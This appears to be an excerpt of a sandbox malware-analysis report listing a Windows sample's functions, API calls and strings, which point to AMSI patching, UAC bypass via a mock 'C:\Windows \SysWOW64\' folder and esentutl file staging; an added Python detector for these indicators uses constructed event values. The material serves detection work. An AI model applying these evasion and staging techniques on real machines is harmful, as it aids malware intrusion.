• API String ID: 2151042543-0
• Opcode ID: ac7d0aa4c8c382ec36603dcf97174c74fc3d6304d897b3efed1303448fc031a4
• Instruction ID: 278a112601ea5f6769326a9e63d6e481a457138f9c92ce8cba9f6138362c7d2b
• Opcode Fuzzy Hash: ac7d0aa4c8c382ec36603dcf97174c74fc3d6304d897b3efed1303448fc031a4
• Instruction Fuzzy Hash: B501D4B1208705AEE712EF61EC228AB7BADEB89B00F61483AF405D3740E671DD10C8B0

Control-flow Graph

Function 02DD8128 (graph 4574). The graph is rendered as an image in the original report; its basic blocks, the Windows API calls inside them and their successors are listed here. Between the API calls every block repeats the same internal helper chain (call 2db4860, 2db49a0, 2db46d4, 2db47ec, 2db49a0, 2db46d4, 2dc89d0), abbreviated below as "helper chain".

• 2dd8128-2dd8517: helper chain, call 2db48ec → 2dd851d, 2dd93a1
• 2dd851d-2dd86f0: helper chain, call 2db4d74, call 2db4df0, CreateProcessAsUserW → 2dd876e, 2dd86f2
• 2dd86f2-2dd8769: helper chain → 2dd876e
• 2dd876e-2dd8879: helper chain → 2dd887b, 2dd8880
• 2dd887b-2dd887e → 2dd8880
• 2dd8880-2dd8ba0: call 2db49f8, call 2dcde50, helper chain, call 2dcd164, helper chain → 2dd8bb9, 2dd8ba2
• 2dd8ba2-2dd8bb4: call 2dc8730 → 2dd8bb9
• 2dd8bb9-2dd939c: helper chain, ResumeThread, helper chain, CloseHandle, helper chain, call 2dc8080, call 2dc894c (x6), CloseHandle, helper chain → 2dd93a1
• 2dd93a1-2dd9524: helper chain, call 2db48ec → 2dd952a, 2dd9cf5
• 2dd952a-2dd9539: call 2db48ec → 2dd9cf5, 2dd953f
• 2dd953f-2dd9812: helper chain, call 2dcf094, helper chain, call 2db7e5c → 2dd9aef, 2dd9818
• 2dd9818-2dd9aea: helper chain, call 2dce358, call 2db4530, helper chain, call 2db4de0 (x2), call 2db4764, call 2dcdc8c → 2dd9aef
• 2dd9aef-2dd9cf0: helper chain, call 2db49f8, call 2dc8d70 → 2dd9cf5
• 2dd9cf5-2ddb2fa: helper chain (many repetitions), call 2dc7c10, call 2dc8338, helper chain, ExitProcess
APIs
  • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F2B7E0,02F2B824,OpenSession,02E37380,02DDB7B8,UacScan,02E37380), ref: 02DD86E9
• ResumeThread.KERNEL32(00000000,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8), ref: 02DD8D33
• CloseHandle.KERNEL32(00000000,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,00000000,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380), ref: 02DD8EB2
  • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
  • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
  • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
• CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02E37380,02DDB7B8,UacInitialize,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380), ref: 02DD92A4
  • Part of subcall function 02DB7E5C: GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
  • Part of subcall function 02DCDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDD5E), ref: 02DCDCCB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DCDD05
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DCDD32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DCDD3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DC83C2), ref: 02DC83A4
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(00000000,OpenSession,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,Initialize,02E37380,02DDB7B8,00000000,00000000,00000000,ScanString,02E37380,02DDB7B8), ref: 02DDB2FA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d027486b05b0c993f1cd1e1631810aff5f286e0bef14b66e5cd0c2039d391567
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcbd651ce73eedeb0af3786373aa06b4dd255c1f488ef34e0fbc8001ccf89278
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d027486b05b0c993f1cd1e1631810aff5f286e0bef14b66e5cd0c2039d391567
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09431F34A4016DDBDB12EB65DCA09CE73BAEF85304F5040E6E00AEB715DB30AE958F65
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DCDD5E), ref: 02DCDCCB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DCDD05
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DCDD32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DCDD3B
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,02DDBB30,00000000,00000000,02DDBB24,00000000,00000000), ref: 02DD40CB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC88B8: LoadLibraryW.KERNEL32(amsi), ref: 02DC88C1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8920
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,000003E8,ScanBuffer,02E37380,02DDB7B8,UacScan,02E37380), ref: 02DD4277
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,ScanBuffer,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,UacInitialize,02E37380,02DDB7B8), ref: 02DD50EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC04: RtlI.N(?,?,00000000,02DCDC7E), ref: 02DCDC2C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC42
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DCDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DCDC7E), ref: 02DCDC61
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DB7E5C: GetFileAttributesA.KERNEL32(00000000,?,02DD041F,ScanString,02E37380,02DDB7B8,OpenSession,02E37380,02DDB7B8,ScanString,02E37380,02DDB7B8,UacScan,02E37380,02DDB7B8,UacInitialize), ref: 02DB7E67
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC85BC: WinExec.KERNEL32(?,?), ref: 02DC8624
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 532c0f07826b0eb48f8b41214c59959d7a5f0e5493ed66d546519adb2b1513f9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b53de9c9764abb14a4aac054a3d9fdc58f352903b04d23a7a33423096ed7e104
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 532c0f07826b0eb48f8b41214c59959d7a5f0e5493ed66d546519adb2b1513f9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24431C34A4015DDBEB11EB65DCA0EDE73B6FF89304F6040A6940AAB715DB30AE85CF61
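The String ID list of this function carries the host-based indicators a detection engineer would key on: a look-alike system directory `C:\Windows \SysWOW64\` (a space before the backslash, so it is a user-writable tree and not the real `C:\Windows\SysWOW64\`), `esentutl.exe /y <src> /d <dst> /o` used as a file-copy utility, and `.url` shortcut keys (`[InternetShortcut]`, `URL=file:`, `IconIndex=`, `HotKey=`) alongside paths under `C:\Users\Public\`. The following is an added example, not output of Joe Sandbox or code from the sample: a small detector run over constructed Sysmon-style events whose values mirror those strings. Field names (`type`, `image`, `cmdline`, `path`, `content`) and all event values are assumptions made for the example.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape. These are NOT events from
# the sandbox run; the values only mirror the strings seen in the dump above.
SAMPLE_EVENTS = [
    {"type": "process",
     "image": r"C:\Windows\System32\esentutl.exe",
     "cmdline": r'C:\Windows\System32\esentutl.exe /y C:\Users\Public\alpha.exe /d "C:\Windows \SysWOW64\per.exe" /o'},
    {"type": "process",
     "image": r"C:\Windows \SysWOW64\per.exe",
     "cmdline": r'"C:\Windows \SysWOW64\per.exe"'},
    {"type": "file",
     "path": r"C:\Users\Public\Libraries\Update.url",
     "content": '[InternetShortcut]\r\nURL=file:"C:\\Users\\Public\\alpha.exe"\r\nIconIndex=0\r\nHotKey=0\r\n'},
    {"type": "process",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"type": "file",
     "path": r"C:\Users\alice\Desktop\docs.url",
     "content": "[InternetShortcut]\r\nURL=https://example.org/\r\n"},
]

# A Windows system directory name followed by one or more spaces and then a
# path separator, e.g. "C:\Windows \SysWOW64\". Genuine system paths never have
# a trailing space in a component; the look-alike tree is creatable without
# admin rights and survives naive string checks for "C:\Windows".
# "\\+" tolerates both single and doubled backslashes in the logged value.
MOCK_SYSTEM_DIR = re.compile(r"[a-z]:\\+(?:windows|program files(?: \(x86\))?) +\\+", re.I)

# esentutl.exe in copy mode: /y <source> /d <destination> [/o]
ESENTUTL_COPY = re.compile(r"esentutl(?:\.exe)?\b.*\s/y\s", re.I)
ESENTUTL_ARGS = re.compile(r'/y\s+"?(?P<src>[^"\s]+)"?.*?/d\s+"?(?P<dst>[^"]+?)"?(?:\s+/|\s*$)', re.I)

PUBLIC_DIR = re.compile(r"^[a-z]:\\users\\public\\", re.I)
EXEC_EXTS = (".exe", ".dll", ".scr", ".cmd", ".bat", ".vbs", ".js", ".pif")


def parse_internet_shortcut(content):
    """Minimal parser for the [InternetShortcut] section of a .url file."""
    values, section = {}, None
    for raw in content.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif "=" in line and section == "internetshortcut":
            key, value = line.split("=", 1)
            values[key.strip().lower()] = value.strip().strip('"')
    return values


def check_process(ev):
    """Flag look-alike system directories and esentutl used as a copy tool."""
    findings = []
    text = ev.get("image", "") + " " + ev.get("cmdline", "")
    m = MOCK_SYSTEM_DIR.search(text)
    if m:
        findings.append({"rule": "mock_system_dir", "match": m.group(0), "image": ev.get("image")})
    if ESENTUTL_COPY.search(ev.get("cmdline", "")):
        args = ESENTUTL_ARGS.search(ev["cmdline"])
        findings.append({"rule": "esentutl_copy",
                         "src": args.group("src") if args else None,
                         "dst": args.group("dst") if args else None})
    return findings


def check_file(ev):
    """Flag .url files that launch a local executable from or into Public."""
    path = ev.get("path", "")
    if not path.lower().endswith(".url"):
        return []
    values = parse_internet_shortcut(ev.get("content", ""))
    url = values.get("url", "")
    if not url.lower().startswith("file:"):
        return []
    target = url[len("file:"):].strip().strip('"')
    if target.lower().endswith(EXEC_EXTS) and (PUBLIC_DIR.match(path) or PUBLIC_DIR.match(target)):
        return [{"rule": "url_shortcut_to_executable", "path": path, "target": target}]
    return []


def run_detections(events):
    findings = []
    for ev in events:
        if ev.get("type") == "process":
            findings.extend(check_process(ev))
        elif ev.get("type") == "file":
            findings.extend(check_file(ev))
    return findings


if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(finding)
```

Against the constructed events the detector raises four findings: the esentutl copy (with source and destination extracted), the mock directory twice (once as the copy destination, once as the image path of the process later started from it) and the `.url` shortcut pointing at `alpha.exe`; the benign notepad launch and the https shortcut produce nothing. The mock-directory check is the most portable of the three, because a space before a path separator has no legitimate use in a system path.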

Control-flow Graph (function at 2dce678; one basic block per line as "node: address range: calls -> successors"; the original rendering colour-codes blocks as Executed / Not Executed)

• 10970: 2dce678-2dce67c -> 10971
• 10971: 2dce681-2dce686 -> 10971, 10972
• 10972: 2dce688-2dcec81: call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4740 * 2 call 2db4860 call 2db4778 call 2db30d4 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4740 call 2db7f2c call 2db49a0 call 2db4d74 call 2db4df0 call 2db4740 call 2db49a0 call 2db4d74 call 2db4df0 call 2dc8788 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c -> 11175, 11176
• 11175: 2dcec87-2dceedd: call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 WaitForSingleObject CloseHandle * 2 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c * 3 -> 11176
• 11176: 2dceee2-2dcef2f: call 2db4500 call 2db4c60 call 2db4500 call 2db4c60 call 2db4500
APIs
  • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
  • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
  • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
  • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
  • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
• WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02E37380,02DCEF4C,OpenSession,02E37380,02DCEF4C,UacScan,02E37380,02DCEF4C,ScanBuffer,02E37380,02DCEF4C,OpenSession,02E37380), ref: 02DCED6E
• CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02E37380,02DCEF4C,OpenSession,02E37380,02DCEF4C,UacScan,02E37380,02DCEF4C,ScanBuffer,02E37380,02DCEF4C,OpenSession), ref: 02DCED76
• CloseHandle.KERNEL32(000008A8,00000000,00000000,000000FF,ScanString,02E37380,02DCEF4C,OpenSession,02E37380,02DCEF4C,UacScan,02E37380,02DCEF4C,ScanBuffer,02E37380,02DCEF4C), ref: 02DCED7F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
• String ID: )"C:\Users\Public\Libraries\aymtmquJ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
• API String ID: 3475578485-3334284989
• Opcode ID: c93ea1fb1c4764be65e09b38b50a68c1cad022b417e9da30c28cab2b261aee9b
• Instruction ID: 57f24139f8adf005da7a097b3fbb5ade8f3f97a76e5286be469a3152d1bca5c4
• Opcode Fuzzy Hash: c93ea1fb1c4764be65e09b38b50a68c1cad022b417e9da30c28cab2b261aee9b
• Instruction Fuzzy Hash: 1F22F075A00159DBEB12EB64D8B1BCE73BAEF85300F6041A9E006AB355DB30AD45CF65

Control-flow Graph

• Executed
• Not Executed
[control-flow graph: function at 2db1724 (basic blocks 2db1684 to 2db1a8b); calls VirtualAlloc and Sleep, with subcalls to 2db1644, 2db15cc and 2db1500]
APIs
• Sleep.KERNEL32(00000000,?,02DB2000), ref: 02DB17D0
• Sleep.KERNEL32(0000000A,00000000,?,02DB2000), ref: 02DB17E6
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 37d28567766f72e6e595e940dca00c4f52cb74a7136eacd386100a14cc6e741f
• Instruction ID: 6fe8d9472dc960a71b36c335868c433b86723af1d645682a18b23d4650ef175d
• Opcode Fuzzy Hash: 37d28567766f72e6e595e940dca00c4f52cb74a7136eacd386100a14cc6e741f
• Instruction Fuzzy Hash: BBB13576A40291CBCB16CF29D4B8395BBE1FF86312F59866ED44A8B3C5C770D891CB90

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02DC88C1
  • Part of subcall function 02DC8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DC82FC,?,?,00000000,00000000,?,02DC8215,00000000,KernelBASE,00000000,00000000,02DC823C), ref: 02DC82C1
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DC82C7
  • Part of subcall function 02DC8274: GetProcAddress.KERNEL32(?,?), ref: 02DC82D9
  • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DC8920
Strings
Memory Dump Source
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: ee21059532828447dd83b60ee7d17443e95b16993ea9ff1a497287957ae984a3
• Instruction ID: bf65925f128882c8595f0ff4cc1980c6b85926372cfd812aa37eeb4dfb9f0698
• Opcode Fuzzy Hash: ee21059532828447dd83b60ee7d17443e95b16993ea9ff1a497287957ae984a3
• Instruction Fuzzy Hash: CAF08C5044C382BAE302E2748C49F4BBACD8B62264F108A5CB1A89B3D2D679D5059BB7

Control-flow Graph (rendered graph omitted; basic blocks span 2db1a8c-2db1c6b and include calls to Sleep, VirtualFree, and the subfunctions 2db1644, 2db14c0, 2db1500 and 2db1560)
APIs
• Sleep.KERNEL32(00000000,?), ref: 02DB1B17
